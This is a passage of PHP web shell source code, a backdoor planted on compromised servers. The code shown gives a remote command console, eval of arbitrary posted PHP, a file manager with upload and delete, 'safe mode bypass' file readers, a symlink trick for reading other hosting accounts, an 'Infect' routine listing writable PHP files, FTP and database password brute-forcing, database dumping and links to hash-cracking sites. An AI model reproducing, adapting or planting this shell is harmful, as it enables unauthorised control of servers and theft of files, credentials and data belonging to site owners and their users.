665 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}else{g(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
666 if(!empty($_POST['p1'])) {
667 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
668 }
669 echo '</textarea><table style="border:1px solid #000;background-color:#000;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
670 echo '</form></div><script>document.cf.cmd.focus();</script>';
671 printFooter();
672}
673// Console end --------------------
674// PHP -----------------------
675function actionPhp() {
676 if( isset($_POST['ajax']) ) {
677 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
678 ob_start();
679 eval($_POST['p1']);
680 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
681 echo strlen($temp), "\n", $temp;
682 exit;
683 }
684 printHeader();
685 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
686 echo '<h1>PHP info</h1><div class=content>';
687 ob_start();
688 phpinfo();
689 $tmp = ob_get_clean();
690 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
691 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
692 $tmp = preg_replace('!h1!msiU','h2',$tmp);
693 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
694 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
695 echo $tmp;
696 echo '</div><br>';
697 }
698 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
699 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
700 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
701 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
702 if(!empty($_POST['p1'])) {
703 ob_start();
704 eval($_POST['p1']);
705 echo htmlspecialchars(ob_get_clean());
706 }
707 echo '</pre></div>';
708 printFooter();
709}
710// PHP end --------------------
711// File manager go --------------------
712function actionFilesMan() {
713 printHeader();
714 echo '<h1>File manager</h1><div class=content>';
715 if(isset($_POST['p1'])) {
716 switch($_POST['p1']) {
717 case 'uploadFile':
718 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
719 echo "Can't upload file!";
720 break;
721 break;
722 case 'mkdir':
723 if(!@mkdir($_POST['p2']))
724 echo "Can't create new dir";
725 break;
726 case 'delete':
727 function deleteDir($path) {
728 $path = (substr($path,-1)=='/') ? $path:$path.'/';
729 $dh = opendir($path);
730 while ( ($item = readdir($dh) ) !== false) {
731 $item = $path.$item;
732 if ( (basename($item) == "..") || (basename($item) == ".") )
733 continue;
734 $type = filetype($item);
735 if ($type == "dir")
736 deleteDir($item);
737 else
738 @unlink($item);
739 }
740 closedir($dh);
741 rmdir($path);
742 }
743 if(is_array(@$_POST['f']))
744 foreach($_POST['f'] as $f) {
745 $f = urldecode($f);
746 if(is_dir($f))
747 deleteDir($f);
748 else
749 @unlink($f);
750 }
751 break;
752 case 'paste':
753 if($_SESSION['act'] == 'copy') {
754 function copy_paste($c,$s,$d){
755 if(is_dir($c.$s)){
756 mkdir($d.$s);
757 $h = opendir($c.$s);
758 while (($f = readdir($h)) !== false)
759 if (($f != ".") and ($f != "..")) {
760 copy_paste($c.$s.'/',$f, $d.$s.'/');
761 }
762 } elseif(is_file($c.$s)) {
763 @copy($c.$s, $d.$s);
764 }
765 }
766 foreach($_SESSION['f'] as $f)
767 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
768 } elseif($_SESSION['act'] == 'move') {
769 function move_paste($c,$s,$d){
770 if(is_dir($c.$s)){
771 mkdir($d.$s);
772 $h = opendir($c.$s);
773 while (($f = readdir($h)) !== false)
774 if (($f != ".") and ($f != "..")) {
775 copy_paste($c.$s.'/',$f, $d.$s.'/');
776 }
777 } elseif(is_file($c.$s)) {
778 @copy($c.$s, $d.$s);
779 }
780 }
781 foreach($_SESSION['f'] as $f)
782 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
783 }
784 unset($_SESSION['f']);
785 break;
786 default:
787 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
788 $_SESSION['act'] = @$_POST['p1'];
789 $_SESSION['f'] = @$_POST['f'];
790 foreach($_SESSION['f'] as $k => $f)
791 $_SESSION['f'][$k] = urldecode($f);
792 $_SESSION['cwd'] = @$_POST['c'];
793 }
794 break;
795 }
796 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
797 }
798 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
799 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
800 global $sort;
801 $sort = array('name', 1);
802 if(!empty($_POST['p1'])) {
803 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
804 $sort = array($match[1], (int)$match[2]);
805 }
806?>
807<script>
808 function sa() {
809 for(i=0;i<document.files.elements.length;i++)
810 if(document.files.elements[i].type == 'checkbox')
811 document.files.elements[i].checked = document.files.elements[0].checked;
812 }
813</script>
814<table width='100%' class='main' cellspacing='0' cellpadding='2'>
815<form name=files method=post>
816<?php
817 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
818 $dirs = $files = $links = array();
819 $n = count($dirContent);
820 for($i=0;$i<$n;$i++) {
821 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
822 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
823 $tmp = array('name' => $dirContent[$i],
824 'path' => $GLOBALS['cwd'].$dirContent[$i],
825 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
826 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
827 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
828 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
829 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
830 );
831 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
832 $files[] = array_merge($tmp, array('type' => 'file'));
833 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
834 $links[] = array_merge($tmp, array('type' => 'link'));
835 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
836 $dirs[] = array_merge($tmp, array('type' => 'dir'));
837 }
838 $GLOBALS['sort'] = $sort;
839 function cmp($a, $b) {
840 if($GLOBALS['sort'][0] != 'size')
841 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
842 else
843 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
844 }
845 usort($files, "cmp");
846 usort($dirs, "cmp");
847 usort($links, "cmp");
848 $files = array_merge($dirs, $links, $files);
849 $l = 0;
850 foreach($files as $f) {
851 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
852 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
853 $l = $l?0:1;
854 }
855 ?>
856 <tr><td colspan=7>
857 <input type=hidden name=a value='FilesMan'>
858 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
859 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
860 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
861 </form></table></div>
862 <?php
863 printFooter();
864}
865// File manager end --------------------
866// String tools go --------------------
867function actionStringTools() {
868 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
869 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
870 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
871 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
872 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
873 $stringTools = array(
874 'Base64 encode' => 'base64_encode',
875 'Base64 decode' => 'base64_decode',
876 'Url encode' => 'urlencode',
877 'Url decode' => 'urldecode',
878 'Full urlencode' => 'full_urlencode',
879 'md5 hash' => 'md5',
880 'sha1 hash' => 'sha1',
881 'crypt' => 'crypt',
882 'CRC32' => 'crc32',
883 'ASCII to HEX' => 'ascii2hex',
884 'HEX to ASCII' => 'hex2ascii',
885 'HEX to DEC' => 'hexdec',
886 'HEX to BIN' => 'hex2bin',
887 'DEC to HEX' => 'dechex',
888 'DEC to BIN' => 'decbin',
889 'BIN to HEX' => 'binhex',
890 'BIN to DEC' => 'bindec',
891 'String to lower case' => 'strtolower',
892 'String to upper case' => 'strtoupper',
893 'Htmlspecialchars' => 'htmlspecialchars',
894 'String length' => 'strlen',
895 );
896 if(isset($_POST['ajax'])) {
897 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
898 ob_start();
899 if(in_array($_POST['p1'], $stringTools))
900 echo $_POST['p1']($_POST['p2']);
901 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
902 echo strlen($temp), "\n", $temp;
903 exit;
904 }
905 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
906 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
907 printHeader();
908 echo '<h1>String conversions</h1><div class=content>';
909 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
910 foreach($stringTools as $k => $v)
911 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
912 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
913 if(!empty($_POST['p1'])) {
914 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
915 }
916 echo"</pre></div><br><h1>Search files:</h1><div class=content>
917 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
918 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
919 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
920 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
921 <tr><td></td><td><input type='submit' value='>>'></td></tr>
922 </table></form>";
923 function printRecursiveGlob($path) {
924 if(substr($path, -1) != '/')
925 $path.='/';
926 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
927 if(is_array($paths)&&@count($paths)) {
928 foreach($paths as $item) {
929 if(@is_dir($item)){
930 if($path!=$item)
931 printRecursiveGlob($item);
932 } else {
933 if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
934 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
935 }
936 }
937 }
938 }
939 if(@$_POST['p3'])
940 printRecursiveGlob($_POST['c']);
941 echo "</div><br><h1>Search for hash:</h1><div class=content>
942 <form method='post' target='_blank' name='hf'>
943 <input type='text' name='hash' style='width:200px;'><br>
944 <input type='hidden' name='act' value='find'/>
945 <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
946 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
947 <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
948 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
949 <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
950 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
951 <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
952 </form></div>";
953 printFooter();
954}
955// String tools end --------------------
956// Safe mode go ------------------------
957function actionSafeMode() {
958 $temp='';
959 ob_start();
960 switch($_POST['p1']) {
961 case 1:
962 $temp=@tempnam($test, 'cx');
963 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
964 echo @file_get_contents($temp);
965 unlink($temp);
966 } else
967 echo 'Sorry... Can\'t open file';
968 break;
969 case 2:
970 $files = glob($_POST['p2'].'*');
971 if( is_array($files) )
972 foreach ($files as $filename)
973 echo $filename."\n";
974 break;
975 case 3:
976 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
977 curl_exec($ch);
978 break;
979 case 4:
980 ini_restore("safe_mode");
981 ini_restore("open_basedir");
982 include($_POST['p2']);
983 break;
984 case 5:
985 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
986 $uid = @posix_getpwuid($_POST['p2']);
987 if ($uid)
988 echo join(':',$uid)."\n";
989 }
990 break;
991 case 6:
992 if(!function_exists('imap_open'))break;
993 $stream = imap_open($_POST['p2'], "", "");
994 if ($stream == FALSE)
995 break;
996 echo imap_body($stream, 1);
997 imap_close($stream);
998 break;
999 }
1000 $temp = ob_get_clean();
1001 printHeader();
1002 echo '<h1>Safe mode bypass</h1><div class=content>';
1003 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
1004 if($temp)
1005 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1006 echo '</div>';
1007 printFooter();
1008}
1009// Safe mode end ---------------------
1010// Logout go -------------------------
1011function actionLogout() {
1012 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1013 echo 'bye!';
1014}
1015// Logout end -------------------------
1016// Suicide go -------------------------
1017function actionSelfRemove() {
1018 printHeader();
1019 if($_POST['p1'] == 'yes') {
1020 if(@unlink(SELF_PATH))
1021 die('Shell has been removed');
1022 else
1023 echo 'unlink error!';
1024 }
1025 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1026 printFooter();
1027}
1028// Suicide end -------------------------
1029function actionTools() {
1030 printHeader();
1031
1032 printFooter();
1033}
1034// Domains go -------------------------
1035function actionDomains() {
1036 printHeader();
1037 error_reporting(0);
1038echo "<title>#Domains & Users</title>";
1039mkdir("sym");
1040symlink("/","0/x.txt");
1041$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
1042$f = fopen ('sym/.htaccess','w');
1043 fwrite($f , $c);
1044
1045$d0mains = @file("/etc/named.conf");
1046if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]"); }
1047echo "<table align=center border=1>
1048<tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
1049foreach($d0mains as $d0main){
1050if(eregi("zone",$d0main)){
1051preg_match_all('#zone "(.*)"#', $d0main, $domains);
1052flush();
1053if(strlen(trim($domains[1][0])) > 2){
1054$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1055echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>"; flush();
1056}}}
1057echo "</table>
1058<p align='center'>
1059FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a
1060href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br>
1061</p>
1062";
1063 printFooter();
1064}
1065// Domains end -----------------------
1066// Infect go -------------------------
1067function actionInfect() {
1068 printHeader();
1069 echo '<h1>Infect</h1><div class=content>';
1070 if($_POST['p1'] == 'infect') {
1071 $target=$_SERVER['DOCUMENT_ROOT'];
1072 function ListFiles($dir) {
1073 if($dh = opendir($dir)) {
1074 $files = Array();
1075 $inner_files = Array();
1076 while($file = readdir($dh)) {
1077 if($file != "." && $file != "..") {
1078 if(is_dir($dir . "/" . $file)) {
1079 $inner_files = ListFiles($dir . "/" . $file);
1080 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1081 } else {
1082 array_push($files, $dir . "/" . $file);
1083 }
1084 }
1085 }
1086 closedir($dh);
1087 return $files;
1088 }
1089 }
1090 foreach (ListFiles($target) as $key=>$file){
1091 $nFile = substr($file, -4, 4);
1092 if($nFile == ".php" ){
1093 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1094 echo "$file<br>";
1095 $i++;
1096 }
1097 }
1098 }
1099 echo "<font color=red size=14>$i</font>";
1100 }else{
1101 echo "<form method=post><input type=submit value=Infect name=infet></form>";
1102 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1103 }
1104 printFooter();
1105}
1106// Infect end -----------------------
1107// Bruteforce go --------------------
1108function actionBruteforce() {
1109 printHeader();
1110 if( isset($_POST['proto']) ) {
1111 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1112 if( $_POST['proto'] == 'ftp' ) {
1113 function bruteForce($ip,$port,$login,$pass) {
1114 $fp = @ftp_connect($ip, $port?$port:21);
1115 if(!$fp) return false;
1116 $res = @ftp_login($fp, $login, $pass);
1117 @ftp_close($fp);
1118 return $res;
1119 }
1120 } elseif( $_POST['proto'] == 'mysql' ) {
1121 function bruteForce($ip,$port,$login,$pass) {
1122 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1123 @mysql_close($res);
1124 return $res;
1125 }
1126 } elseif( $_POST['proto'] == 'pgsql' ) {
1127 function bruteForce($ip,$port,$login,$pass) {
1128 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1129 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1130 @pg_close($res);
1131 return $res;
1132 }
1133 }
1134 $success = 0;
1135 $attempts = 0;
1136 $server = explode(":", $_POST['server']);
1137 if($_POST['type'] == 1) {
1138 $temp = @file('/etc/passwd');
1139 if( is_array($temp) )
1140 foreach($temp as $line) {
1141 $line = explode(":", $line);
1142 ++$attempts;
1143 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1144 $success++;
1145 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1146 }
1147 if(@$_POST['reverse']) {
1148 $tmp = "";
1149 for($i=strlen($line[0])-1; $i>=0; --$i)
1150 $tmp .= $line[0][$i];
1151 ++$attempts;
1152 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1153 $success++;
1154 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1155 }
1156 }
1157 }
1158 } elseif($_POST['type'] == 2) {
1159 $temp = @file($_POST['dict']);
1160 if( is_array($temp) )
1161 foreach($temp as $line) {
1162 $line = trim($line);
1163 ++$attempts;
1164 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1165 $success++;
1166 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1167 }
1168 }
1169 }
1170 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1171 }
1172 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1173 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1174 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1175 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1176 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1177 .'<span>Server:port</span></td>'
1178 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1179 .'<tr><td><span>Brute type</span></td>'
1180 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1181 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1182 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1183 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1184 .'<td><input type=text name=login value="root"></td></tr>'
1185 .'<tr><td><span>Dictionary</span></td>'
1186 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1187 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1188 echo '</div><br>';
1189 printFooter();
1190}
1191// Bruteforce end --------------------
1192// Sql go ----------------------------
1193function actionSql() {
1194 class DbClass {
1195 var $type;
1196 var $link;
1197 var $res;
1198 function DbClass($type) {
1199 $this->type = $type;
1200 }
1201 function connect($host, $user, $pass, $dbname){
1202 switch($this->type) {
1203 case 'mysql':
1204 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1205 break;
1206 case 'pgsql':
1207 $host = explode(':', $host);
1208 if(!$host[1]) $host[1]=5432;
1209 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1210 break;
1211 }
1212 return false;
1213 }
1214 function selectdb($db) {
1215 switch($this->type) {
1216 case 'mysql':
1217 if (@mysql_select_db($db))return true;
1218 break;
1219 }
1220 return false;
1221 }
1222 function query($str) {
1223 switch($this->type) {
1224 case 'mysql':
1225 return $this->res = @mysql_query($str);
1226 break;
1227 case 'pgsql':
1228 return $this->res = @pg_query($this->link,$str);
1229 break;
1230 }
1231 return false;
1232 }
1233 function fetch() {
1234 $res = func_num_args()?func_get_arg(0):$this->res;
1235 switch($this->type) {
1236 case 'mysql':
1237 return @mysql_fetch_assoc($res);
1238 break;
1239 case 'pgsql':
1240 return @pg_fetch_assoc($res);
1241 break;
1242 }
1243 return false;
1244 }
1245 function listDbs() {
1246 switch($this->type) {
1247 case 'mysql':
1248 return $this->res = @mysql_list_dbs($this->link);
1249 break;
1250 case 'pgsql':
1251 return $this->res = $this->query("SELECT datname FROM pg_database");
1252 break;
1253 }
1254 return false;
1255 }
1256 function listTables() {
1257 switch($this->type) {
1258 case 'mysql':
1259 return $this->res = $this->query('SHOW TABLES');
1260 break;
1261 case 'pgsql':
1262 return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1263 break;
1264 }
1265 return false;
1266 }
1267 function error() {
1268 switch($this->type) {
1269 case 'mysql':
1270 return @mysql_error($this->link);
1271 break;
1272 case 'pgsql':
1273 return @pg_last_error($this->link);
1274 break;
1275 }
1276 return false;
1277 }
1278 function setCharset($str) {
1279 switch($this->type) {
1280 case 'mysql':
1281 if(function_exists('mysql_set_charset'))
1282 return @mysql_set_charset($str, $this->link);
1283 else
1284 $this->query('SET CHARSET '.$str);
1285 break;
1286 case 'mysql':
1287 return @pg_set_client_encoding($this->link, $str);
1288 break;
1289 }
1290 return false;
1291 }
1292 function dump($table) {
1293 switch($this->type) {
1294 case 'mysql':
1295 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1296 $create = mysql_fetch_array($res);
1297 echo $create[1].";\n\n";
1298 $this->query('SELECT * FROM `'.$table.'`');
1299 while($item = $this->fetch()) {
1300 $columns = array();
1301 foreach($item as $k=>$v) {
1302 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1303 $columns[] = "`".$k."`";
1304 }
1305 echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1306 }
1307 break;
1308 case 'pgsql':
1309 $this->query('SELECT * FROM '.$table);
1310 while($item = $this->fetch()) {
1311 $columns = array();
1312 foreach($item as $k=>$v) {
1313 $item[$k] = "'".addslashes($v)."'";
1314 $columns[] = $k;
1315 }
1316 echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1317 }
1318 break;
1319 }
1320 return false;
1321 }
1322 };
1323 $db = new DbClass($_POST['type']);
1324 if(@$_POST['p2']=='download') {
1325 ob_start("ob_gzhandler", 4096);
1326 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1327 $db->selectdb($_POST['sql_base']);
1328 header("Content-Disposition: attachment; filename=dump.sql");
1329 header("Content-Type: text/plain");
1330 foreach($_POST['tbl'] as $v)
1331 $db->dump($v);
1332 exit;
1333 }
1334 printHeader();
1335 ?>
1336 <h1>Sql browser</h1><div class=content>
1337 <form name="sf" method="post">
1338 <table cellpadding="2" cellspacing="0">
1339 <tr>
1340 <td>Type</td>
1341 <td>Host</td>
1342 <td>Login</td>
1343 <td>Password</td>
1344 <td>Database</td>
1345 <td></td>
1346 </tr>
1347 <tr>
1348 <input type=hidden name=a value=Sql>
1349 <input type=hidden name=p1 value='query'>
